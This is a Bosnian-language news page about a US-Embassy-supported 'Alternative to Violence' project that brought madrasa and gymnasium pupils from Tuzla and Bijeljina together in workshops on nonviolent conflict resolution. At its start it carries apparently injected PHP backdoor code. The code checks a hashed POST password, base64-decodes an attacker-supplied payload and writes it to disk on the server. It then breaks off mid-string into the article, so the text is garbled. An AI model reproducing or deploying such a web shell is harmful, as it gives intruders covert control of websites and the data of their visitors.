function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" MLADI LJUDI KAO ALTERNATIVA NASILJU - Medžlis Islamske zajednice Bijeljina

MLADI LJUDI KAO ALTERNATIVA NASILJU

MLADI LJUDI KAO ALTERNATIVA NASILJU

www.dw.de…Učenici „Behram-begove“ Medrese iz Tuzle i Gimnazije „Filip Višnjić“ iz Bijeljine zajednički su realizirali projekat „Alternativa nasilju“, podržan od Ambasade SAD u BiH. Ovo je drugi projekat dvije partnerske škole u protekle dvije godine. Po dvanaest učenika obje škole učestvovali su u radionicama putem kojih su se bolje upoznali i naučili osnove nenasilnog rješavanja konflikata.

DSCN6989
Američki projekat za učenike Medrese i Gimnazije

Prva faza ovog projekta provedena je tokom dvodnevnog susreta u decembru prošle godine u Behram-begovoj medresi, a završni jednodnevni dio projekta, uz dodjelu certifikata, realiziran je u polovinom marta ove godine u gimnaziji Filip Višnjić. Iskustva učesnika potvrđuju da je komunikacija osnov za razumijevanje i razbijanje predrasuda. Upoznali su znamenitosti oba grada i stekli nova iskustva i prijatelje. 

DSCN7043
Sa glavnim bijeljinskim imamom Samir-ef. Camićem u Sultan Sulejmanovoj Atik džamiji

Dobar put u životu

Dodjeli certifikata učesnicima završnog dijela projekta u Gimnaziji „Filip Višnjić“ prisustvovali su predstavnici Srpske pravoslavne crkve i Samir-ef. Camić, glavni imam Medžlisa Islamske zajednice u Bijeljini.

Certifikate su uručili Drago Đurić, direktor Gimnazije, Mensur-ef. Husić, pomoćnik direktora Medrese, te Marija Stavropulos, zamjenica direktora Ureda Ambasade SAD u Banjaluci.

Marija Stavropulos dodjeljuje certifikate ucesnicima projekta
Marija Stavropulos uručuje certifikate

„Vidimo da su rezultati dobri i da ste zaista dobro radili u ovom projektu. Slušajući vaše utiske primjetila sam da ste ostvarili dobra prijateljstva. Pratila sam slične projekte u mnogim školama u Bosni i Hercegovini i iskustva su slična, pozitivna. Niste samo naučili nešto novo o rješavanju problema nego ste naučili i o drugim ljudima u vašoj zemlji koji su drugačiji od vas. To je vrlo važno, da ste se družili, da ste razgovarali i to je dobar put ka onome što je ispred vas u životu,“ kazala je Marija Stavropulos.

Drago Đurić, direktor Gimnazije „Filip Višnjić“, zahvalio se svim učesnicima projekta. „Ovdje, kod nas u Semberiji, posebno je poželjna tolerancija. Često u životu brojimo i do deset i do pedeset, a moramo biti spremni i da oprostimo, da se naučimo toleranciji. Mi smo uveliko u saradnji sa medresom i učenici su mi prenijeli utiske nakon boravka u Tuzli. Zahvaljujem se direktoru škole što su napravili takvu atmosferu da se učenici dobro osjećaju,“ kazao je direktor Đurić.

Evaluacija projekta u Gimnaziji
U Gimnaziji “Filip Višnjić”

Mensur-ef. Husić, pomoćnik direktora „Behram-begove medrese“,“ zahvalio se direktoru bijeljinske gimnazije i svim učesnicima ovog projekta, posebno istaknuvši: „Zahvaljujem se predstavnicima Američke ambasade u BiH koja je podržala ovaj projekat. Pozdravljam predstavnike Srpske pravoslavne crkve i selamim glavnog imama Medžlisa Islamske zajednice Bijeljina. Ovo je izvanredan projekat u kojem učestvuju mladi ljudi koji pripadaju različitim religijskim i kulturnim tradicijama. Ovaj projekat je dao jako dobre rezultate. Pratio sam rad učenika, a u Medresi smo se prilagodili činjenici da je većina učenika pravoslavne vjere postila.

DSCN7018
Mensur-ef. Husić, pomoćnik direktora “Behram-begove” Medrese

Nadam se da smo napravili prvi korak ka razumijevanju, a to je komunikacija. Sve dok komuniciramo, nećemo imati predrasuda jedni prema drugima. Bićemo spremni da drugoga razumijevamo iz njegove perspektive, a to je vrlo važno, drugog i drugačijeg razumijevati iz njegove perspektive, a ne iz vlastite perspektive. Samo tako ćemo drugoga vidjeti kao nadogradnju sebe, a ne kao svoj nedostatak. Zato bih vas pozvao da i u našim životima nastavimo dalje sa ovim projektom. Podsjetio bih vas na jednu izreku mudrog Konfučija koji kaže, „U životu čini drugome ono što činiš sam sebi,“ a to je sadržano i u svetim knjigama. Spomenuo bih i njegov aksiom solidarnosti koji kaže: „Nastoj da uzdigneš sebe tako što ćeš uzdinuti drugu osobu“. Mladi ljudi su ovdje primijetili jednu veoma važnu činjenicu, da u životu ne mogu uspjeti bez plana. Dobro isplanirane aktivnosti, dobro isplaniran život, znači 70% uspjeha. To je veoma važno za vas i za vašu budućnost. Imamo ovakve potencijale, ali mi je žao što naše obrazovne institucije nisu u stanju omogućiti da se šarenilo tih potencijala razvije i da nam svima, u svakom pogledu bude bolje.”

Značajno za sve nas

Koordinatori projekta bili su profesori dvije partnerske škole koje su ponudile svoje prostorije, a ručak, večera i večernje druženje upriličeni su u prostorijama Mektebskog centra Islamske zajednice u Bijeljini.

Druzenje nakon vecere u Mektepskom centru u Bijeljini
Druženje u Mektebskom centru u Bijeljini

Mladenka Perić, profesorica psihologije u Gimnaziji „Filip Višnjić“, kaže da je projekat dobar i da je ovo vrijedno iskustvo i za učenika i za profesore. „Na žalost, nisam učestvovala u prvom projektu. Sada jesam i sa kolegom Asmirom sam u kontaktu od prvog dana realizacije projekta pa do završetka. Drago mi je što je gimnazija imala saradnju sa medresom i to je jako značajno za sve nas. Posebno je važan aspekt razbijanja predrasuda. Kad smo trebali da idemo u Tuzli, učenici nisu znali šta da očekuju, kako će se sve odvijati. Prema njihovim riječima, od početka su bili zadovoljni i uvidjeli su da među njima uopšte nema razlika. To su samo djeca koja žive u dva grada, a vršnjaci su i imaju ista interesovanja, slične poglede na život. Imam iskustva sa sličnim radionicama, a ove su bile jako kvalitetne. Učenicima je na zabavan način skrenuta pažnja na ozbiljne stvari, na ono što oni svakodnevno rade i proživljavaju, a u stvari toga nisu ni svjesni,“ kazala je Mladenka Perić.

Mladenka Peric profesoricaAsmir Doric profesor

Asmir-ef. Dorić, profesor engleskog jezika u „Behram-begovoj medresi“ ima slično mišljenje i veliki je pobornik ovakvih projekata saradnje obrazovnih ustanova. „Saradnja između medrese u Tuzli i gimnazije u Bijeljini počela je prije par godina projektom koji se zvao „Jedna knjiga jedna BiH“ (One book, one BiH), kojeg je također podržala Američka ambasada. Čitali smo knjigu američkog pisca Šermana Aleksija i radili smo određene radionice kako bismo razbijali predrasude i stvarali odnose prijateljstva među učenicima. Upoznavali smo jedni druge, upoznavali kulturno-istorijske osobenosti Tuzle i Bijeljine i, naravno, stvarali temelje za kreiranje jednog boljeg, mirnijeg, ljepšeg društva. Za Behram-begovu medresu ova saradnja znači puno u smislu otvaranja škole prema drugima, njenih učenika prema drugim učenicima i učenje kroz komunikaciju sa drugima. Ove radionice pokazuju našim učenicima kako se problemi rješavaju na jedan nenasilan način kroz komunikaciju i dijalog sa drugim ljudima,“ rekao je Asmir-ef. Dorić.

Nova nada za Bosnu i Hercegovinu

Učesnici projekta bili su otvoreni i kreativni u međusobnoj saradnji tokom realiziranja projekta. Rado govore  o pozitivnim iskustvima i vrijednosti sticanja znanja i novih prijatelja.

„Ovo je moje prvo učetvovanje u ovakvom projektu i prezadovoljan sam. Ovo je jedno lijepo i novo iskustvo. Upoznao sam nove prijatelje, stekao nova poznanstva, koja do sada nisam imao u Bijeljini. Naučili smo mnogo o komunikaciji, o razumijevanju drugih i prihvatanju različitog, drugačijeg mišljenja,“ kazao je Muhamed Karić, učenik četvrtog razreda Behram-begove medrese u Tuzli.

Muhamed KaricAndjela Ruzic

Anđela Ružić, učenica četvrtog razred gimnazije Filip Višnjić i ranije je učestvovala u sličnim projektima: „Upoznala sam drugačiji način života, svoje vršnjake koji žive nekim drugim načinom i zbog toga mi je ovaj projekat značajniji u odnosu na neke druge. Mogla sam da vidim kako drugi ljudi reaguje na određene situacije i mislim da je saradnja medrese i gimnazije izuzetno značajna i za ovu državu i za nas same, kako bismo se što bolje izgradili kao pojedinci.“

„Bila sam učesnik nekih sličnih radionica na temu vršnjačkog nasilja i ova tema nije mi nepoznata. Moram da istaknem da je ovo jedna od originalnijih radionica kojima sam prisustvovala. Dosta novih stvari smo naučili i istakla bih rješavanje konflikta u šest tačaka, gdje smo rješavali probleme koji se mogu desiti i rješavati u društvu. Od svega, najviše cijenim što sam upoznala toliko mladih ljudi i vjerujem da će svih nas dvadeset i četvoro biti nova nada za Bosnu i Hercegovinu. U svim ovim ljudima vidim veliki potencijal iz svih oblasti koje jedno društvo treba,“ kazala je Amra Mahmutović, učenica tuzlanske „Behram-begove“ medrese.

Amra MahmutovicAndjela Mihajlovic

„Učestvovala sam i u ranijem projektu u kojem su učestvovali učenici medrese i gimnazije. Bilo je lijepo ponovo vidjeti Tuzlu i prijatelje koje sam tamo već imala. Radionice su bile veoma zanimljive, predavači fenomenalni i lijepo smo se družili. Upoznala sam i neke nove ljude, a zbližila sam se sa nekima iz moga grada. Tema je bila odlična i korisno je naučiti nešto o različitim konfliktima i situacijama u kojima se svakodnevno nalazimo, a nikada, možda, nismo razmišljali o njima. Već sam ranije dolazila u Mektepski centar Bijeljina, imam prijatelje koji su aktivni ovdje i znam kako radi Islamska zajednica u našem gradu,“ rekla je Anđela Mihajlović, učenica bijeljinske Gimnazije „Filip Višnjić.

Zajednicka fotografija

Pozitivno mijenjanje sebe i svijeta oko sebe

Projekat „Alternativa nasilju“ (Alternative to Violence Project – AVP) temelji se i razvija iz stvarnog životnog iskustva, a izgrađuje se na duhovnoj osnovi, potičući svakog sudionika na pozitivni odnos prema sebi i drugima. U Bosni i Hercegovini ovaj projekat traje od 2004. godine i prerasta u cijeli pokret, program, čija je svrha orijentisana na redukciju nasilja u međuljudskim odnosima u bosanskohercegovačkom društvu. Misija programa je orijentisana na osnaživanje i podsticanje ljudi da uče nenasilne vidove komunikacije putem potvrđivanja sebe, poštivanja drugih, izgradnje timova, saradnje i povjerenja. Temelji se i razvija iz stvarnog životnog iskustva sudionika potičući ih na pozitivno mijenjanje samog sebe i svijeta oko sebe.